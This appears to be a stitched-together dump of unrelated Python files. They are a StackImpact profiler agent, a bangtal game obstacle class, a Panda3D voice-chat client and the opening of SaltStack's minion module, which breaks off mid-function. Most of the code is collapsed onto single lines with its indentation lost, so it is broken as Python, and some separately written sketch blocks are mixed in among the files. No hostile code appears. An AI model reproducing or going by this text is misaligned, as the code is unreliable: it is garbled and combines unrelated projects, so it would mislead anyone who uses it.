from __future__ import division, print_function, absolute_import import time import datetime import sys import traceback import socket import threading import os import signal import atexit import platform import random import math from .runtime import min_version, runtime_info, register_signal from .utils import timestamp, generate_uuid from .config import Config from .config_loader import ConfigLoader from .message_queue import MessageQueue from .frame_cache import FrameCache from .reporters.process_reporter import ProcessReporter from .reporters.profile_reporter import ProfileReporter, ProfilerConfig from .reporters.error_reporter import ErrorReporter from .reporters.span_reporter import SpanReporter from .profilers.cpu_profiler import CPUProfiler from .profilers.allocation_profiler import AllocationProfiler from .profilers.block_profiler import BlockProfiler class Span(object): def __init__(self, stop_func = None): if stop_func: self.stop_func = stop_func else: self.stop_func = None def stop(self): if self.stop_func: self.stop_func() def __enter__(self): pass def __exit__(self, exc_type, exc_value, traceback): self.stop() class Agent(object): AGENT_VERSION = "1.2.6" SAAS_DASHBOARD_ADDRESS = "https://agent-api.stackimpact.com" def __init__(self, **kwargs): self.agent_started = False self.agent_destroyed = False self.profiler_active = False self.span_active = False self.main_thread_func = None self.run_ts = None self.run_id = None self.config = Config(self) self.config_loader = ConfigLoader(self) self.message_queue = MessageQueue(self) self.frame_cache = FrameCache(self) self.process_reporter = ProcessReporter(self) self.error_reporter = ErrorReporter(self) self.span_reporter = SpanReporter(self) config = ProfilerConfig() config.log_prefix = 'CPU profiler' config.max_profile_duration = 20 config.max_span_duration = 5 config.max_span_count = 30 config.span_interval = 20 config.report_interval = 120 self.cpu_reporter = ProfileReporter(self, CPUProfiler(self), config) config = ProfilerConfig() config.log_prefix = 'Allocation profiler' config.max_profile_duration = 20 config.max_span_duration = 5 config.max_span_count = 30 config.span_interval = 20 config.report_interval = 120 self.allocation_reporter = ProfileReporter(self, AllocationProfiler(self), config) config = ProfilerConfig() config.log_prefix = 'Block profiler' config.max_profile_duration = 20 config.max_span_duration = 5 config.max_span_count = 30 config.span_interval = 20 config.report_interval = 120 self.block_reporter = ProfileReporter(self, BlockProfiler(self), config) self.options = None def get_option(self, name, default_val=None): if name not in self.options: return default_val else: return self.options[name] def start(self, **kwargs): if not min_version(2, 7) and not min_version(3, 4): raise Exception('Supported Python versions 2.6 or higher and 3.4 or higher') if platform.python_implementation() != 'CPython': raise Exception('Supported Python interpreter is CPython') if self.agent_destroyed: self.log('Destroyed agent cannot be started') return if self.agent_started: return self.options = kwargs if 'auto_profiling' not in self.options: self.options['auto_profiling'] = True if 'dashboard_address' not in self.options: self.options['dashboard_address'] = self.SAAS_DASHBOARD_ADDRESS if 'agent_key' not in self.options: raise Exception('missing option: agent_key') if 'app_name' not in self.options: raise Exception('missing option: app_name') if 'host_name' not in self.options: self.options['host_name'] = socket.gethostname() 
self.run_id = generate_uuid() self.run_ts = timestamp() self.config_loader.start() self.message_queue.start() self.frame_cache.start() self.cpu_reporter.setup() self.allocation_reporter.setup() self.block_reporter.setup() self.span_reporter.setup() self.error_reporter.setup() self.process_reporter.setup() # execute main_thread_func in main thread on signal def _signal_handler(signum, frame): if(self.main_thread_func): func = self.main_thread_func self.main_thread_func = None try: func() except Exception: self.exception() return True if not runtime_info.OS_WIN: register_signal(signal.SIGUSR2, _signal_handler) if self.get_option('auto_destroy') is None or self.get_option('auto_destroy') is True: # destroy agent on exit def _exit_handler(*arg): if not self.agent_started or self.agent_destroyed: return try: self.message_queue.flush() self.destroy() except Exception: self.exception() atexit.register(_exit_handler) if not runtime_info.OS_WIN: register_signal(signal.SIGQUIT, _exit_handler, once = True) register_signal(signal.SIGINT, _exit_handler, once = True) register_signal(signal.SIGTERM, _exit_handler, once = True) register_signal(signal.SIGHUP, _exit_handler, once = True) self.agent_started = True self.log('Agent started') def enable(self): if not self.config.is_agent_enabled(): self.cpu_reporter.start() self.allocation_reporter.start() self.block_reporter.start() self.span_reporter.start() self.error_reporter.start() self.process_reporter.start() self.config.set_agent_enabled(True) def disable(self): if self.config.is_agent_enabled(): self.cpu_reporter.stop() self.allocation_reporter.stop() self.block_reporter.stop() self.span_reporter.stop() self.error_reporter.stop() self.process_reporter.stop() self.config.set_agent_enabled(False) def profile(self, name='Default'): if not self.agent_started or self.span_active: return Span(None) self.span_active = True selected_reporter = None active_reporters = [] if self.cpu_reporter.started: active_reporters.append(self.cpu_reporter) if self.allocation_reporter.started: active_reporters.append(self.allocation_reporter) if self.block_reporter.started: active_reporters.append(self.block_reporter) if len(active_reporters) > 0: selected_reporter = active_reporters[int(math.floor(random.random() * len(active_reporters)))] if not selected_reporter.start_profiling(True, True): selected_reporter = None start_timestamp = time.time() def stop_func(): if selected_reporter: selected_reporter.stop_profiling() duration = time.time() - start_timestamp self.span_reporter.record_span(name, duration) if not self.get_option('auto_profiling'): self.config_loader.load(True) if selected_reporter: selected_reporter.report(True); self.message_queue.flush(True) self.span_active = False return Span(stop_func) def _start_profiler(self, reporter): if not self.agent_started or self.get_option('auto_profiling'): return self.span_active = True reporter.start() reporter.start_profiling(True, False) def _stop_profiler(self, reporter): if not self.agent_started or self.get_option('auto_profiling'): return reporter.stop_profiling() reporter.report(False) reporter.stop() self.message_queue.flush(False) self.span_active = False def start_cpu_profiler(self): self._start_profiler(self.cpu_reporter) def stop_cpu_profiler(self): self._stop_profiler(self.cpu_reporter) def start_allocation_profiler(self): self._start_profiler(self.allocation_reporter) def stop_allocation_profiler(self): self._stop_profiler(self.allocation_reporter) def start_block_profiler(self): 
self._start_profiler(self.block_reporter) def stop_block_profiler(self): self._stop_profiler(self.block_reporter) def destroy(self): if not self.agent_started: self.log('Agent has not been started') return if self.agent_destroyed: return self.config_loader.stop() self.message_queue.stop() self.frame_cache.stop() self.cpu_reporter.stop() self.allocation_reporter.stop() self.block_reporter.stop() self.error_reporter.stop() self.span_reporter.stop() self.process_reporter.stop() self.cpu_reporter.destroy() self.allocation_reporter.destroy() self.block_reporter.destroy() self.error_reporter.destroy() self.span_reporter.destroy() self.process_reporter.destroy() self.agent_destroyed = True self.log('Agent destroyed') def log_prefix(self): return '[' + datetime.datetime.now().strftime('%H:%M:%S.%f') + '] StackImpact ' + self.AGENT_VERSION + ':' def log(self, message): if self.get_option('debug'): print(self.log_prefix(), message) def print_err(self, *args, **kwargs): print(*args, file=sys.stderr, **kwargs) def error(self, message): if self.get_option('debug'): self.print_err(self.log_prefix(), message) def exception(self): if self.get_option('debug'): traceback.print_exc() def delay(self, timeout, func, *args): def func_wrapper(): try: func(*args) except Exception: self.exception() t = threading.Timer(timeout, func_wrapper, ()) t.start() return t def schedule(self, timeout, interval, func, *args): tw = TimerWraper() def func_wrapper(): start = time.time() try: func(*args) except Exception: self.exception() with tw.cancel_lock: if not tw.canceled: tw.timer = threading.Timer(abs(interval - (time.time() - start)), func_wrapper, ()) tw.timer.start() tw.timer = threading.Timer(timeout, func_wrapper, ()) tw.timer.start() return tw def run_in_thread(self, func): def func_wrapper(): try: func() except Exception: self.exception() t = threading.Thread(target=func_wrapper) t.start() return t def run_in_main_thread(self, func): if self.main_thread_func: return False self.main_thread_func = func os.kill(os.getpid(), signal.SIGUSR2) return True class TimerWraper(object): def __init__(self): self.timer = None self.cancel_lock = threading.Lock() self.canceled = False def cancel(self): with self.cancel_lock: self.canceled = True self.timer.cancel()
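# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module): starting the
# agent and wrapping a piece of work in a span.  The agent key, app name and
# the workload are placeholders made up for the example.
# ---------------------------------------------------------------------------
def _example_usage():
    agent = Agent()
    agent.start(
        agent_key='YOUR_AGENT_KEY',  # placeholder
        app_name='ExampleApp',       # placeholder
        debug=True,
    )

    # profile() picks one of the active profilers at random, records a span
    # and reports it when the span is stopped.
    span = agent.profile('example-span')
    total = sum(i * i for i in range(100000))  # stand-in workload
    span.stop()

    agent.destroy()
    return total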
obstacle.py
from bangtal import *
import threading
import random


class Obstacle(Object):
    def __init__(self, scene, player):
        super().__init__(random.choice(['images/cat1.png', 'images/cat2.png',
                                        'images/cat3.png', 'images/cat4.png',
                                        'images/dog1.png', 'images/dog2.png',
                                        'images/dog3.png', 'images/dog4.png']))
        self.scene = scene
        self.x = 1000
        self.y = random.choice([150, 300, 450])
        self.locate(scene, self.x, self.y)
        self.setScale(0.45)
        self.show()
        self.end = False
        self.speed = 5.0
        self.player = player

    def start(self):
        self.t = threading.Thread(target=self.move)
        self.t.daemon = True
        self.t.start()

    def move(self):
        self.timer1 = Timer(int(10 / self.speed))
        self.timer1.onTimeout = self.onTimeOut
        self.timer1.start()
        currentTime = self.timer1.get()
        while not self.scene.isCollision:
            time2 = self.timer1.get()
            # Advance the obstacle one step each time enough timer time has elapsed.
            if (currentTime - time2) > (1 / (self.speed * 10)):
                currentTime = time2
                self.x -= (10 * self.speed)
                self.locate(self.scene, int(self.x), self.y)
                if self.x < 100:
                    if self.player.y == self.y:
                        print("collision")
                        showMessage("Game End!")
                        self.scene.isCollision = True
                        self.timer1.onTimeout()
                if self.x < 0:
                    break
        self.timer1.onTimeout()

    def onTimeOut(self):
        self.y = -1
        self.hide()
        del self  # only drops the local reference; the object is already hidden
        return
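# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original module): what Obstacle needs
# from the objects passed to it, and how a game scene might spawn obstacles.
# The `scene` and `player` arguments are stand-ins; in the real game they
# come from the bangtal-based scene code.
# ---------------------------------------------------------------------------
def _spawn_obstacles(scene, player, count=3):
    # `scene` must expose a boolean `isCollision` flag (set True on game over)
    # and `player` must expose its current lane as `player.y`, because
    # Obstacle.move() compares it with the obstacle's own y position.
    obstacles = []
    for _ in range(count):
        obstacle = Obstacle(scene, player)
        obstacle.start()  # starts the background movement thread
        obstacles.append(obstacle)
    return obstacles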
__init__.py
#Server code adapted from optional lectures from panda3d.core import * from direct.showbase.ShowBase import ShowBase import sys, math, os, random from direct.gui.OnscreenText import OnscreenText from direct.interval.IntervalGlobal import * from direct.interval.LerpInterval import * from direct.gui.DirectGui import * from direct.task.Task import Task import time from Listener.ListenerManager import * from Listener.VolumeReader import * from threading import Thread from Graphics.Word import * from Graphics.CloudManager import * from Graphics.SceneManager import * from Database.DatabaseManager import * from Graphics.MenuBobble import * from Utils.StringHelper import * import socket import threading from queue import Queue import copy import time import datetime import random server = None class Struct(object): pass data = Struct() def runGame(): global data initializeConstants() initializeVariables() loginScreen() setupLighting(render) startTasks() base.run() #connects to server def connectToServer(): global server HOST = "localhost" PORT = 50011 server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.connect((HOST,PORT)) print("Connected to server!") #handles server messages def handleServerMsg(server, serverMsg): server.setblocking(1) msg = "" command = "" while True: msg += server.recv(10).decode("UTF-8") command = msg.split("\n") while (len(command) > 1): readyMsg = command[0] msg = "\n".join(command[1:]) serverMsg.put(readyMsg) command = msg.split("\n") #sets up default values def initializeVariables(): global data data.activeScreen3d = render.attachNewNode("activescreen") data.activeScreen2d = aspect2d.attachNewNode("activescreen") data.buttonScreen = render.attachNewNode("buttons") data.micIndex = None data.otherPlayers = dict() clearPersonalData() #clears all data thats important per player def clearPersonalData(): global data data.state = "" data.myName = "" data.friend = "" data.transcript = [] data.words = [] data.friendButton = None data.buttons = [] data.ringtone = None data.music = None #stores important locations def initializeConstants(): global data data.centerScreenPos = (.35, 0, .1) data.logoutButtonLoc = (-.4, 1.1, -.25) data.menuButtonLoc = data.logoutButtonLoc data.friendButtonLoc = (-.1, 1.1, -.25) #loads clouds and scene def loadModels(): global data loadClouds(data.activeScreen3d) loadBackground(data.activeScreen3d) #music from https://www.youtube.com/watch?v=1ZYbU82GVz4&t=622s def loadMusic(): global data data.music = base.loader.loadSfx("Graphics/sounds/relaxing.ogg") data.music.play() #starts all tasks to run in background def startTasks(): newWordTimer = .8 moveCloudTimer = .02 updateTimer = .2 taskMgr.doMethodLater(updateTimer, update, "update") taskMgr.doMethodLater(newWordTimer, getNewWord, "word") taskMgr.doMethodLater(moveCloudTimer, moveClouds, "cloud") #Updates the display and gets new words def update(task): while (serverMsg.qsize() > 0): msg = serverMsg.get(False) try: msg = msg.split() command = msg[0] global data if(command== "myIDis"): pass elif(command == "myMicIs"): data.micIndex = int(msg[1]) elif(command == "newPlayer"): pass elif(command == "loginEvent"): playerName = msg[2] if(playerName!=data.myName): data.otherPlayers[playerName] = list() if(data.state=="menu"): updateMenu() elif(command == "logoffEvent"): playerName = msg[2] if(playerName!=data.myName): if(playerName in data.otherPlayers): del data.otherPlayers[playerName] if(data.state=="menu"): updateMenu() elif(data.state== "inCall"): if(data.friend == playerName): data.friend = 
"" stopListener() goBackToMenu() elif(command == "tryDial"): if(data.state=="menu"): player1 = msg[2] player2 = msg[3] if(player1 == data.myName): dialingMenu(data.myName, player2) elif(player2 == data.myName): acceptMenu(data.myName, player1) elif(command == "acceptCall"): player1 = msg[2] player2 = msg[3] if(data.myName == player1 or data.myName == player2): dialFriend() elif(command == "declineCall"): player1 = msg[2] player2 = msg[3] if(data.myName==player1 or data.myName == player2): data.friend = None goBackToMenu() elif(command == "newWord"): if(data.state=="inCall"): label = msg[2] playerName = msg[3] if(data.myName==playerName or data.friend ==playerName): (x,y,z) = (8, 35, 10) color = "red" textLine = data.friend + ": " + label if(playerName ==data.myName): x = -8 color = "blue" textLine = data.myName + ": " + label data.transcript.append(textLine) newWord = Word(playerName, data.activeScreen3d, x, y, z, label, color, server) data.otherPlayers[playerName].append(newWord) elif(command == "moveWord"): if(data.state=="inCall"): label = msg[2] playerName = msg[3] for word in data.otherPlayers[playerName]: if(word.getText()==label): word.throwWord() except: print(msg) print("failed") serverMsg.task_done() return task.cont #grabs words from listenermanager def getNewWord(task): global data global phrases if(phrases.empty()==False): label = phrases.get() msg = "newWord %s %s\n" % (label, data.myName) server.send(msg.encode()) for player in data.otherPlayers: newWordList = [] for word in data.otherPlayers[player]: if(word.move()): newWordList.append(word) data.otherPlayers[player] = newWordList return task.again def createLogoutButton(): global data (cx, cy, cz) = data.logoutButtonLoc co = clickableOption(cx, cy, cz, "Logout", goBackToLogin, data.buttonScreen) data.buttons.append(co) def createMenuButton(): global data (cx, cy, cz) = data.menuButtonLoc co = clickableOption(cx, cy, cz, "Menu", goBackToMenu, data.buttonScreen) data.buttons.append(co) def removeFriendButton(): global data if(data.friendButton!=None): data.friendButton.destroy() data.friendButton.getObj().removeNode() def createAddFriendButton(): global data removeFriendButton() if(data.friend in getFriends(data.myName)): text = "UnFriend" color = "red" else: text = "Friend" color = "green" (cx, cy, cz) = data.friendButtonLoc co = clickableOption(cx, cy, cz, text, toggleFriend, data.buttonScreen, color) data.friendButton = co #toggles whether to add/remove a friend def toggleFriend(): global data if(data.friend in getFriends(data.myName)): removeFriend(data.myName, data.friend) else: addFriend(data.myName, data.friend) createAddFriendButton() def goBackToLogin(): global data if(data.myName!=""): userLogOff() loginScreen() def goBackToMenu(tmp=None): global data data.state = "menu" updateMenu() loadMusic() def loadPlayerName(activeScreen, name): createTextAt(1.3, 0, -.9, name, activeScreen) def loginScreen(): global data clearScreen() clearPersonalData() data.state = "login" loadMusic() setupMenuBackground(data.activeScreen3d) (cx, cy, cz) = data.centerScreenPos createTextAt(cx, cy, cz, "What's your name?", data.activeScreen2d) entry = DirectEntry(text = "", scale=.2, command=passwordScreen, initialText="", numLines = 2, focus=1, frameSize = (-1.0,0,0,0)) entry.setPos(-.2,0,-.1) entry.reparentTo(data.activeScreen2d) def passwordScreen(playerName, attempts = 0): global data clearScreen() setupMenuBackground(data.activeScreen3d) (cx, cy, cz) = data.centerScreenPos (shiftedX, shiftedY, shiftedZ) = (-.55, 0, -.3) wrongNodePath = 
None if(attempts!=0): createTextAt(-.3, 0, -.2, "X", data.activeScreen2d, "red") data.state = "password" entry = DirectEntry(text = "", scale=.2, command=menuScreen, extraArgs = [playerName], obscured=1, initialText="", numLines = 2, focus=1, frameSize = (-1.0,0,0,0)) entry.setPos(cx + shiftedX, cy + shiftedY, cz + shiftedZ) entry.reparentTo(data.activeScreen2d) if(isTracked(playerName)==False): toDisplay = "New player!\nEnter a new password: \n" else: toDisplay = "Welcome back!\nEnter your password: \n" loadPlayerName(data.activeScreen2d, playerName) createTextAt(cx, cy, cz + .1, toDisplay, data.activeScreen2d) createLogoutButton() def menuScreen(input, playerName): global data if(isTracked(playerName)==False): newPlayer(playerName, input) if(doPasswordsMatch(input, getStoredPassword(playerName))==False): passwordScreen(playerName, 1) return data.otherPlayers[playerName] = list() data.myName= playerName data.state="menu" msg = "loginEvent %s\n" % data.myName server.send(msg.encode()) setOnlineStatus(data.myName, True) def updateMenu(): global data clearScreen() stopRinging() setupMenuBackground(data.activeScreen3d) toDisplay = "Online Players:" online = getOnlinePlayers() space = 0 (cx, cy, cz) = data.centerScreenPos if(len(online)==1): toDisplay+= "\nNo players online!" for player in online: if(player == data.myName): continue color = "blue" if(player in getFriends(data.myName)): color = "green" co = PlayerGraphic(-.2 + space, 2, -.2, player, data.myName, server, data.activeScreen3d, color) data.buttons.append(co) space += .2 loadPlayerName(data.activeScreen2d, data.myName) createTextAt(cx, cy, cz, toDisplay, data.activeScreen2d) createLogoutButton() def acceptMenu(playerName, friend): global data data.state = "calling" data.friend = friend print("Incoming call!") clearScreen() stopMusic() createTextAt(.4,1,.2, "Incoming call from\n" + friend, data.activeScreen2d) setupMenuBackground(data.activeScreen3d) loadPlayerName(data.activeScreen2d, playerName) co1 = clickableOption(.2, 1.1, -.2, "Decline", declineCall, data.buttonScreen, "red") co2 = clickableOption(-.1, 1.1, -.2, "Accept", acceptCall, data.buttonScreen, "green") data.buttons.append(co1) data.buttons.append(co2) #ringtone http://soundbible.com/1407-Phone-Ringing.html data.ringtone = base.loader.loadSfx("Graphics/sounds/ringtone.ogg") data.ringtone.play() def dialingMenu(playerName, friend): global data data.state = "calling" data.friend = friend print("Dialing!") clearScreen() stopMusic() setupMenuBackground(data.activeScreen3d) loadPlayerName(data.activeScreen2d, playerName) co = clickableOption(.2, 1.1, -.2, "Hangup", declineCall, data.buttonScreen, "red") data.buttons.append(co) createTextAt(.4, 1, .2, "Calling " + friend, data.activeScreen2d) def dialFriend(): global data data.state = "inCall" clearScreen() stopRinging() initializeListener(data.micIndex) loadPrettyLayout(data.myName, data.friend, data.activeScreen2d) createGravity() co = clickableOption(-.25, 1.1, -.25, "Transcript", downloadTranscript, data.buttonScreen, "blue") data.buttons.append(co) loadModels() (x,y,z) = data.menuButtonLoc co = clickableOption(x, y, z, "Hangup", declineCall, data.buttonScreen, "red") data.buttons.append(co) createAddFriendButton() loadPlayerName(data.activeScreen2d, data.myName) def acceptCall(): global data msg = "acceptCall %s %s\n" % (data.myName, data.friend) server.send(msg.encode()) def declineCall(): global data msg = "declineCall %s %s\n" % (data.myName, data.friend) server.send(msg.encode()) def stopRinging(): global data 
if(data.ringtone!=None): data.ringtone.stop() data.ringtone = None def stopMusic(): global data if(data.music!=None): data.music.stop() data.music = None #ping sound from http://soundbible.com/2018-Plop.html def clearScreen(): ping = base.loader.loadSfx("Graphics/sounds/ping.ogg") ping.setVolume(.3) ping.play() global data for button in data.buttons: button.destroy() data.buttons = [] for path in data.buttonScreen.getChildren(): path.removeNode() for path in data.activeScreen3d.getChildren(): path.removeNode() for path in data.activeScreen2d.getChildren(): path.removeNode() def userLogOff(): global data msg = "logoffEvent %s\n" % data.myName server.send(msg.encode()) data.state = "logoff" setOnlineStatus(data.myName, False) stopListener() def downloadTranscript(): ts = time.time() fileName = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H-%M-%S') path = os.environ["HOMEPATH"] + os.sep + "Desktop" + os.sep + fileName + ".txt" f = open(path,"w+") for line in data.transcript: f.write(line + "\n") f.close() def setupWindow(): wp = WindowProperties() wp.setSize(1920, 1080) wp.setTitle("ChatWorld") base.win.requestProperties(wp) base.disableMouse() if __name__ == "__main__": connectToServer() base.exitFunc = userLogOff setupWindow() serverMsg = Queue(100) threading.Thread(target = handleServerMsg, args = (server, serverMsg)).start() runGame()
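# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original module): the newline-framed,
# space-separated protocol used between this client and the server, as
# implied by handleServerMsg() and the server.send() calls above.  The helper
# names are made up for the example.
# ---------------------------------------------------------------------------
def _encodeCommand(*fields):
    # e.g. _encodeCommand("newWord", "hello", "alice") -> b"newWord hello alice\n"
    return (" ".join(str(f) for f in fields) + "\n").encode()


def _splitCommands(bufferText):
    # Complete commands are separated by "\n"; the last element may be a
    # partial command that should be kept until the next recv() call.
    parts = bufferText.split("\n")
    return parts[:-1], parts[-1]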
minion.py
# -*- coding: utf-8 -*- ''' Routines to set up a minion ''' # Import python libs from __future__ import absolute_import, print_function, with_statement, unicode_literals import functools import os import sys import copy import time import types import signal import random import logging import threading import traceback import contextlib import multiprocessing from random import randint, shuffle from stat import S_IMODE import salt.serializers.msgpack from binascii import crc32 # Import Salt Libs # pylint: disable=import-error,no-name-in-module,redefined-builtin from salt.ext import six from salt.ext.six.moves import range from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO import salt.transport.client import salt.defaults.exitcodes from salt.utils.ctx import RequestContext # pylint: enable=no-name-in-module,redefined-builtin import tornado HAS_PSUTIL = False try: import salt.utils.psutil_compat as psutil HAS_PSUTIL = True except ImportError: pass HAS_RESOURCE = False try: import resource HAS_RESOURCE = True except ImportError: pass try: import zmq.utils.monitor HAS_ZMQ_MONITOR = True except ImportError: HAS_ZMQ_MONITOR = False try: import salt.utils.win_functions HAS_WIN_FUNCTIONS = True except ImportError: HAS_WIN_FUNCTIONS = False # pylint: enable=import-error # Import salt libs import salt import salt.client import salt.crypt import salt.loader import salt.beacons import salt.engines import salt.payload import salt.pillar import salt.syspaths import salt.utils.args import salt.utils.context import salt.utils.data import salt.utils.error import salt.utils.event import salt.utils.files import salt.utils.jid import salt.utils.minion import salt.utils.minions import salt.utils.network import salt.utils.platform import salt.utils.process import salt.utils.schedule import salt.utils.ssdp import salt.utils.user import salt.utils.zeromq import salt.defaults.events import salt.defaults.exitcodes import salt.cli.daemons import salt.log.setup import salt.utils.dictupdate from salt.config import DEFAULT_MINION_OPTS from salt.defaults import DEFAULT_TARGET_DELIM from salt.utils.debug import enable_sigusr1_handler from salt.utils.event import tagify from salt.utils.odict import OrderedDict from salt.utils.process import (default_signals, SignalHandlingMultiprocessingProcess, ProcessManager) from salt.exceptions import ( CommandExecutionError, CommandNotFoundError, SaltInvocationError, SaltReqTimeoutError, SaltClientError, SaltSystemExit, SaltDaemonNotRunning, SaltException, SaltMasterUnresolvableError ) import tornado.gen # pylint: disable=F0401 import tornado.ioloop # pylint: disable=F0401 log = logging.getLogger(__name__) # To set up a minion: # 1. Read in the configuration # 2. Generate the function mapping dict # 3. Authenticate with the master # 4. Store the AES key # 5. Connect to the publisher # 6. 
Handle publications def resolve_dns(opts, fallback=True): ''' Resolves the master_ip and master_uri options ''' ret = {} check_dns = True if (opts.get('file_client', 'remote') == 'local' and not opts.get('use_master_when_local', False)): check_dns = False # Since salt.log is imported below, salt.utils.network needs to be imported here as well import salt.utils.network if check_dns is True: try: if opts['master'] == '': raise SaltSystemExit ret['master_ip'] = salt.utils.network.dns_check( opts['master'], int(opts['master_port']), True, opts['ipv6'], attempt_connect=False) except SaltClientError: retry_dns_count = opts.get('retry_dns_count', None) if opts['retry_dns']: while True: if retry_dns_count is not None: if retry_dns_count == 0: raise SaltMasterUnresolvableError retry_dns_count -= 1 import salt.log msg = ('Master hostname: \'{0}\' not found or not responsive. ' 'Retrying in {1} seconds').format(opts['master'], opts['retry_dns']) if salt.log.setup.is_console_configured(): log.error(msg) else: print('WARNING: {0}'.format(msg)) time.sleep(opts['retry_dns']) try: ret['master_ip'] = salt.utils.network.dns_check( opts['master'], int(opts['master_port']), True, opts['ipv6'], attempt_connect=False) break except SaltClientError: pass else: if fallback: ret['master_ip'] = '127.0.0.1' else: raise except SaltSystemExit: unknown_str = 'unknown address' master = opts.get('master', unknown_str) if master == '': master = unknown_str if opts.get('__role') == 'syndic': err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \ 'Set \'syndic_master\' value in minion config.'.format(master) else: err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \ 'Set \'master\' value in minion config.'.format(master) log.error(err) raise SaltSystemExit(code=42, msg=err) else: ret['master_ip'] = '127.0.0.1' if 'master_ip' in ret and 'master_ip' in opts: if ret['master_ip'] != opts['master_ip']: log.warning( 'Master ip address changed from %s to %s', opts['master_ip'], ret['master_ip'] ) if opts['source_interface_name']: log.trace('Custom source interface required: %s', opts['source_interface_name']) interfaces = salt.utils.network.interfaces() log.trace('The following interfaces are available on this Minion:') log.trace(interfaces) if opts['source_interface_name'] in interfaces: if interfaces[opts['source_interface_name']]['up']: addrs = interfaces[opts['source_interface_name']]['inet'] if not opts['ipv6'] else\ interfaces[opts['source_interface_name']]['inet6'] ret['source_ip'] = addrs[0]['address'] log.debug('Using %s as source IP address', ret['source_ip']) else: log.warning('The interface %s is down so it cannot be used as source to connect to the Master', opts['source_interface_name']) else: log.warning('%s is not a valid interface. 
Ignoring.', opts['source_interface_name']) elif opts['source_address']: ret['source_ip'] = salt.utils.network.dns_check( opts['source_address'], int(opts['source_ret_port']), True, opts['ipv6'], attempt_connect=False) log.debug('Using %s as source IP address', ret['source_ip']) if opts['source_ret_port']: ret['source_ret_port'] = int(opts['source_ret_port']) log.debug('Using %d as source port for the ret server', ret['source_ret_port']) if opts['source_publish_port']: ret['source_publish_port'] = int(opts['source_publish_port']) log.debug('Using %d as source port for the master pub', ret['source_publish_port']) ret['master_uri'] = 'tcp://{ip}:{port}'.format( ip=ret['master_ip'], port=opts['master_port']) log.debug('Master URI: %s', ret['master_uri']) return ret def prep_ip_port(opts): ret = {} # Use given master IP if "ip_only" is set or if master_ip is an ipv6 address without # a port specified. The is_ipv6 check returns False if brackets are used in the IP # definition such as master: '[::1]:1234'. if opts['master_uri_format'] == 'ip_only' or salt.utils.network.is_ipv6(opts['master']): ret['master'] = opts['master'] else: ip_port = opts['master'].rsplit(':', 1) if len(ip_port) == 1: # e.g. master: mysaltmaster ret['master'] = ip_port[0] else: # e.g. master: localhost:1234 # e.g. master: 127.0.0.1:1234 # e.g. master: [::1]:1234 # Strip off brackets for ipv6 support ret['master'] = ip_port[0].strip('[]') # Cast port back to an int! Otherwise a TypeError is thrown # on some of the socket calls elsewhere in the minion and utils code. ret['master_port'] = int(ip_port[1]) return ret def get_proc_dir(cachedir, **kwargs): ''' Given the cache directory, return the directory that process data is stored in, creating it if it doesn't exist. The following optional Keyword Arguments are handled: mode: which is anything os.makedir would accept as mode. uid: the uid to set, if not set, or it is None or -1 no changes are made. Same applies if the directory is already owned by this uid. Must be int. Works only on unix/unix like systems. gid: the gid to set, if not set, or it is None or -1 no changes are made. Same applies if the directory is already owned by this gid. Must be int. Works only on unix/unix like systems. ''' fn_ = os.path.join(cachedir, 'proc') mode = kwargs.pop('mode', None) if mode is None: mode = {} else: mode = {'mode': mode} if not os.path.isdir(fn_): # proc_dir is not present, create it with mode settings os.makedirs(fn_, **mode) d_stat = os.stat(fn_) # if mode is not an empty dict then we have an explicit # dir mode. So lets check if mode needs to be changed. if mode: mode_part = S_IMODE(d_stat.st_mode) if mode_part != mode['mode']: os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode']) if hasattr(os, 'chown'): # only on unix/unix like systems uid = kwargs.pop('uid', -1) gid = kwargs.pop('gid', -1) # if uid and gid are both -1 then go ahead with # no changes at all if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \ [i for i in (uid, gid) if i != -1]: os.chown(fn_, uid, gid) return fn_ def load_args_and_kwargs(func, args, data=None, ignore_invalid=False): ''' Detect the args and kwargs that need to be passed to a function call, and check them against what was passed. 
''' argspec = salt.utils.args.get_function_argspec(func) _args = [] _kwargs = {} invalid_kwargs = [] for arg in args: if isinstance(arg, dict) and arg.pop('__kwarg__', False) is True: # if the arg is a dict with __kwarg__ == True, then its a kwarg for key, val in six.iteritems(arg): if argspec.keywords or key in argspec.args: # Function supports **kwargs or is a positional argument to # the function. _kwargs[key] = val else: # **kwargs not in argspec and parsed argument name not in # list of positional arguments. This keyword argument is # invalid. invalid_kwargs.append('{0}={1}'.format(key, val)) continue else: string_kwarg = salt.utils.args.parse_input([arg], condition=False)[1] # pylint: disable=W0632 if string_kwarg: if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args: # Function supports **kwargs or is a positional argument to # the function. _kwargs.update(string_kwarg) else: # **kwargs not in argspec and parsed argument name not in # list of positional arguments. This keyword argument is # invalid. for key, val in six.iteritems(string_kwarg): invalid_kwargs.append('{0}={1}'.format(key, val)) else: _args.append(arg) if invalid_kwargs and not ignore_invalid: salt.utils.args.invalid_kwargs(invalid_kwargs) if argspec.keywords and isinstance(data, dict): # this function accepts **kwargs, pack in the publish data for key, val in six.iteritems(data): _kwargs['__pub_{0}'.format(key)] = val return _args, _kwargs def eval_master_func(opts): ''' Evaluate master function if master type is 'func' and save it result in opts['master'] ''' if '__master_func_evaluated' not in opts: # split module and function and try loading the module mod_fun = opts['master'] mod, fun = mod_fun.split('.') try: master_mod = salt.loader.raw_mod(opts, mod, fun) if not master_mod: raise KeyError # we take whatever the module returns as master address opts['master'] = master_mod[mod_fun]() # Check for valid types if not isinstance(opts['master'], (six.string_types, list)): raise TypeError opts['__master_func_evaluated'] = True except KeyError: log.error('Failed to load module %s', mod_fun) sys.exit(salt.defaults.exitcodes.EX_GENERIC) except TypeError: log.error('%s returned from %s is not a string', opts['master'], mod_fun) sys.exit(salt.defaults.exitcodes.EX_GENERIC) log.info('Evaluated master from module: %s', mod_fun) def master_event(type, master=None): ''' Centralized master event function which will return event type based on event_map ''' event_map = {'connected': '__master_connected', 'disconnected': '__master_disconnected', 'failback': '__master_failback', 'alive': '__master_alive'} if type == 'alive' and master is not None: return 